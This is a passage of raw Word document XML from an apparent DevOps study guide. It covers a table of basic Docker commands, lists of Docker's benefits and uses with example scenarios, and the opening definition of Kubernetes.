            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E8F098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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="406E28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reate and start a container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="71933328" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB5F3F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ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="355DFBD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ist running containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="196CAAC3" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="371E6D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exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="255719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 command inside a running container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="140A9233" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78DFBA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top / docker rm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39F556A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top and remove containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78C10E8E" w14:textId="3124565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646" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF26BA" w14:textId="4B848AD6" w:rsidR="00613601" w:rsidRPr="00CE4B95" w:rsidRDefault="004E48D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="901" w:name="_Toc197868115"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is Docker helpful</w:t>
      </w:r>
      <w:r w:rsidR="00613601" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="901"/>
    </w:p>
    <w:p w14:paraId="3AB6B4B2" w14:textId="47D27C3F" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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is </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hugely helpful</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in modern software development and DevOps for many reasons. Here's how Docker adds value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EE57C"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2C1E0">
          <v:rect id="_x0000_i3647" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF6913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Consistent Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D327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containers package all dependencies (OS, libraries, etc.) with the app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF69A8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t works on my machine"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> problems disappear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E934B4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ame container runs identically on dev, test, staging, and production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC47B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4587C">
          <v:rect id="_x0000_i3648" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917749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Fast &amp; Lightweight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DFD71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Containers are </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unlike VMs) — they share the host OS kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B3CD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Startup is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not minutes like VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6AA3E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ss resource usage = more efficient CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281EC8E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36A08">
          <v:rect id="_x0000_i3649" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E4D0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3. Easy CI/CD Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAD590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ntegrates with Jenkins, GitHub Actions, GitLab CI, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D8C2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images can be built and deployed automatically in pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C36A4F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579EB5">
          <v:rect id="_x0000_i3650" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47624CD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4. Microservices Ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212A18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microservice runs in its own container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670D6F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sy to manage, scale, and deploy services independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09827B3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04B83">
          <v:rect id="_x0000_i3651" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEDE3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5. Simplifies Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6035B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test environments in containers quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9241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pin up disposable containers for integration or end-to-end tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEB51A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DBE8E">
          <v:rect id="_x0000_i3652" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9AF06"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6. Version Control for Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AC23D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t xml:space="preserve">Dockerfiles serve as </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>infrastructure code</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6C9F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eams can version and audit the environment setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDEE126"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3F885">
          <v:rect id="_x0000_i3653" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00702F2C"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7. Isolation &amp; Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE5F9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run in isolated user spaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A35C49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Avoids conflicts between applications/services on the same host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4157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71E33B">
          <v:rect id="_x0000_i3654" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7982E7"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8. Portability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9FA2A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nywhere: laptop, VM, cloud (AWS, Azure, GCP), or Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E8B4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once, run anywhere" concept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1CA48"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70AE6">
          <v:rect id="_x0000_i3655" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9FB6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Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F8B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cal development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E9328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nvironment replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4364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Microservice deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33862DD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inuous delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99EC4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ad testing and sandboxing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5509F85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gacy app modernization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7809725F" w14:textId="488B9721"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656" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E2C03F" w14:textId="5CEC4D64" w:rsidR="00613601" w:rsidRPr="00CE4B95" w:rsidRDefault="00875D42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="902" w:name="_Toc197868116"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of Docker</w:t>
      </w:r>
      <w:r w:rsidR="00613601" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="902"/>
    </w:p>
    <w:p w14:paraId="0522D140" w14:textId="340D7C02" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>build, ship, and run applications in isolated, lightweight containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's what it helps with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C23AB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143572C5">
          <v:rect id="_x0000_i3657" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53A711"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Primary Uses of Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D2B8A"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1. Application Packaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC2A6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Packages an app with its dependencies into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker image</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B42A2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nsures consistency across environments (dev, test, prod).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C30258"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2. Environment Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613DEFC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container runs in its own isolated space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025021C"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Prevents software conflicts between apps/services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CEAAF6"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3. Portability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181817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 containers run the same across:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604FE9B3"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Developer’s laptop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C55875"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On-prem servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF8367"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Public/Private clouds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C0ECD9"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Kubernetes clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324AFFEC"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4. Faster Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0248D85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start in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, enabling faster testing and deployment cycles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9FCEF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5. Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D3489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Run multiple containers for different services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7494096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microservice can be developed, deployed, and scaled independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E392102"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6. DevOps and CI/CD Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B44848"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Automates build, test, and deploy steps in pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F45C40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Works well with Jenkins, GitHub Actions, GitLab, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F150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7. Version Control for Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105622A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files define infrastructure as code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D3A29"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Track changes in app environment setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D25A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8. Resource Efficiency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09C9E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use </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less memory/CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to full virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92E3F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6180A5F6">
          <v:rect id="_x0000_i3658" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D40D7D8"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Example Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5542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run PostgreSQL locally</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without installing it → use a Docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30996DF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need to test your app on </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Node.js 14 and 18</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → spin up containers with different versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091BD5B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deploy a Java Spring Boot app</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Redis and MySQL in production → use Docker Compose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4538B0" w14:textId="78D4F0AB" w:rsidR="006C0B8D"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B814230">
          <v:rect id="_x0000_i3659" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="006C0B8D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF5944" w14:textId="79EF40F7" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="903" w:name="_Toc197868117"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="903"/>
    </w:p>
    <w:p w14:paraId="456E56D9" w14:textId="45FCCE43" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="001854F1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="904" w:name="_Toc197868118"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="904"/>
    </w:p>
    <w:p w14:paraId="5339830B" w14:textId="02AD8443" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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rnetes (K8s)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>open-source container orchestration platform</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automate the deployment, scaling, and management of containerized applications</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6065200D"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E4F29C">
          <v:rect id="_x0000_i3660" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
